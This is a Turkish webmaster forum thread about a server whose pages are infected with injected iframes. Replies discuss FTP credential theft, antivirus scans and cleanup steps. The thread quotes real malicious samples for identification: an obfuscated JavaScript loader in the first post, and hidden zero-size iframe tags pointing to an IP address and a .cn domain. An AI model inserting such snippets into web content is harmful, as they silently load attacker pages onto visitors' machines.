Acil sunucunun heryerinde iframe virüsü

[Hukonline]

Arkadaşlar,

Ne yaptıysam olmadı hostu sildim açtım olmadı.
Şifreleri değiştirdim olmadı.
Tekrar kurdum tarattım olmadı.
Sunucuya bitdefender kurdum olmadı.


Başka ne yapayım yeter ettirdi bu.

Kod buna benzer hatta bu;

Quote:

<script>this.z='';var b=document;var w=window;var q;if(q!='_m' && q != ''){q=null};function p(s){var _=['hjt7t7pj:B/B/Mh7uBd7o7n7gj-7cBojmB.6h6ajoj1B2B3M.Mc6o6m7.BoMd7n7ojk7l7aBsjsBn 7i6kji6-jr7uj.jbMe7sBt6n6eBw6sMm7a7ljlB.Brju7:B870B8j0j/7f6i6l7ejsjt7u6bje6.jcBo6m6/7fji7lMeMsjtMujb7e6.7c6o6mj/7ajtMt7.jn7eBtM/MnMoBwjd7o6w7nBljo7aMdMaMlBl6.Mc6ojm7/6gjoBoMgMlMe7.McMo6mB/j'.replace(/[j6B7M]/g, ''), 's

Lütfen yardım çıldırmak üzereyim.

[null]

whm ye claw modulu ekle tarat ardından pcni sağlam bir şekilde taratmalısın pcnin temiz olduguna guvenli oldugunu dusundugundede iframe yemis siteni pcne indirip o kodları kalıdırp yeniden hosta atmalısın virus yanlızca sitede değil aynı zamanda pcnizdede var bunu unutmayın

destek@renkas.com.tr yada destek@atawebhhost.com msn eklersen yardımcı olabiliriz

[Hukonline]

o modülü nereden bulabilirim.

[KLAMP]

Sayın " Hukonline " aşağıda verdiğim linkten ulaşabilirsiniz

ClamAV Scanner Kurulumu

Kurulumu biraz uzun sürebiliyor şuan daha yeni bir versiyonu
var bu yüzden kendini güncellmeiş durumda
kurulum bitenekadar whm paneli kapatmayın
konuyla ilgili başka bir sıkıntınız varsa sormaktan çekinmeyiniz
Bilgimiz dahilinde ben ve forumdaki diğer arakadaşlar size yardım edeceklerdir
İyi Çalışmalar Dilerim

[Hukonline]

bu kurulu bende fakat toplu taramayı beceremedim

[KLAMP]

Bitdefender AntiVirüs

daha etkilidir diye düşünüyorum

[skystar]

client taraflı benim bildiğim bu işin çözen tek antivirüs format c: zamanında benide çok uğraştırdı şükür bu aralar bulaşmıyor. Sunucu taraflı bir çözümle hiç ilgilenmedim doğrusu aklıma hiç bir şey gelmedi.

Sunucu taraflı bir çözüm nasıl olacak ki? birincisi kodları şifreliyor ikincisi kodlar durmadan değişiyor. Üçünücüsü bunun permissionlarla falan işi yok direk ftp protokolünden yazıyor kodları dosyalara.

Bu virüs benim bilgisayarıma bulaşmışken ben kaspersky ve eset smart security ile tarattım hiç bir şey bulamadı. Bence en güzeli format ve ftp bilgilerinin değiştirilmesi karar yine size ait

[KLAMP]

En kesin çözüm sunucu makinasını Formatlamak yeniden kurmak kesin çözüm bu
sunucu makinasını kurduğunuzda açık portalarıda kapatmayı unutmayın

[skystar]

Quote:

Originally Posted by KLAMP

En kesin çözüm sunucu makinasını Formatlamak yeniden kurmak kesin çözüm bu
sunucu makinasını kurduğunuzda açık portalarıda kapatmayı unutmayın

Bu olayın sunucu ile hiç bir ilgisi yok tamamen ftp hesaplarına baglanan pc ile ilgisi var. Bu arada portları kapatırsa iyi olur kimse sitelere falan giremez kesin çözüm olur Biz bunu niye düşünemedik acaba.

[baracuda]

İlgili sorun tamamen ftp kullanıcısının bilgisayarına bulaşan bir virüs sebebiyle oluyor sunucu ile alakası yok ancak ücretli bir script mod securty kullanarak bunu çözdüğünü iddia ediyor scriptin adresi aşağıda aynı zamanda konuyla iligli detaylı izahatda aşağıda.

http://www.configserver.com/cp/cxs.html

Yeni çıkan Ve Tehlike Arz Eden Bir Virus
IFRAME EXPLOID yada IFRAME VIRUS

Son zamanlarda büyük hızla yolunda yüreyen yeni virüs bir çok webmasterin sorunu oldu ve olmayada devam ediyor..
Bu virüs bir kere bilgisayarınıza bulaştıkdan sonra o bilgisayarla hangi sitenin ftp'ini açarsanız açın girdiğiniz
ftp bilgilerini kaydederek, sitelere girip index.php , index.html , index.htm , default.asp 'in içlerine iframe kodu atıyor
atılan iframe kodu şu şekildedir..


CODE
<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>


Ve Sadece www/public htm/ dizinine değil diğer bütün klasörülerin içinde bulunan index.php , index.html , index.htm ,
default.asp 'in içinede atıyor..

Virüs size nasıl bulaşır ?

Başka kişinin sitesine bulaşmışsa ve sizde o siteye girdiyseniz üstelik hiç bir antivirüs yüklü değilse bilgisayarınıza;
Bilinki o virüs artık sizinde bilgisayarınızda ve girdiğiniz bütün ftp'lere girmeye başlayacaktır..

Peki Virüs Sizin Bilgisayarınıza Bulaştı ve bunun farkına vardınız ne yapmamız gerekir ?

Sadece ftp bilgilerinizi alabildiği için hemen dosyalarınızı pc'ye atıp içindeki iframe kodlarını silin ve tekrar ftp'den
upload edin. Sonra hiç vakit kaybetmeden cpanel/plesk panelinize girin ve şifrenizi değiştirin.
Bu işlemleri yaptıktan sonra sakın ftp'den giriş yapmayın. Çünkü ftp'den giriş yaptığınızda değiştirdiğiniz şifreyide
alarak tekrar dosyalarıza iframe atmaya başlayacaktır.. Bu işlemleride yaptıktan sonra bilgisayarıza format atin..

Virüs Bana bulaşmadı Nasıl korunabilirim ?

Filezilla veya cuteftp kullanarak serverinize bağlanın, index.php ,index.htm, index.html, default.asp Bütün klasörlerdeki
bu saydığımız uzantılı sayfalarınızın chmod değerlerini 444 yapın. Bilgisayarınıza Nod32, Panda veya Kaspersky kurun
( Biz Kaspersky tavsiye ediyoruz ) Bilgisayarınızı güvene alın.
Her ftpye girdikten sonra direk cpanelden yada plesk paneden girerek ftp şifrenizi değiştirin.
Birde bilgisayarınıza Ad-Aware SE Personal 'i kurun iki günde bir tarama yaptırın.

************************************************** ********

Herhangi bir web sayfanızdan virüs önce bilgisayarınıza sızıyor ve daha sonra
FTP benzeri program ile sitenize bulaşıyor. Haliyle bu şekilde her yere yayılmaya başlıyor.
virüs bi süre sonra masaüstünüze update.exe diye bi virüs ekleyip pc'ye zarar vermeye başlıyor.

Çözüm için ne yapabiliriz?
Öncelikle ilgisayarınızda dosya bulma menüsünden cd Win.Agent.pz(ntos.exe) bulduğunuzda
hemen silin. Daha sonra antitrojan ve antivirüsler ile bilgisayarınızı tarayın.
Bu işlemlerden sonra FTP'yi kullanıp dosyaları kontrol edin.

Diğer bir alternatif olarak;
Sitenizde bulunan dosyaları FTP yoluyla bilgisayarınıza indirip belirtilen
iframe kodlarının olup olmadığını kontrol kontrol ederek virüs taramasından geçirin.
Güvende olduğunuzu hissediyorsanız Daha sonra dosyaları FTP'den tekrar sitenize atın.
Yada Cute FTP kullanıyorsanız Ctrl-F kısayılu ile arama menüsünü açarak
sitenizte 81.95.145.240 ip numarasını arayın.

işlem sonucu dosyaların cmod ayarlarını kontrol ederek ilgili dosyaların ayarlarını 444 yapın.

Ayrıca tarayıcı olarak Firefox kullanmanın bu tip saldırıları önleyeceğini düşünüyoruz.




iframe virüsünün bulaştığı, yani uyarı veren dosyada aşağıdaki satırlara benzer kodlar bulunur.
CODE<iframe src="http://110.a38q.cn/lx.htm" width="100" height="0" frameborder="0"></iframe>
Son zamanlarda adres kısmı biraz değişikliğe uğradı.Fakat bu kod genelde sayfanın en sonunda olur.
yani </html> den sonra yada önce.
Kodu tamamen silip kaydetmeniz yeterli olacaktır.Ama eğer bilgisayarınızda bir antivirüs yoksa (avast yada nod32) bu iki programdan birini yükleyip tarama yaptırın.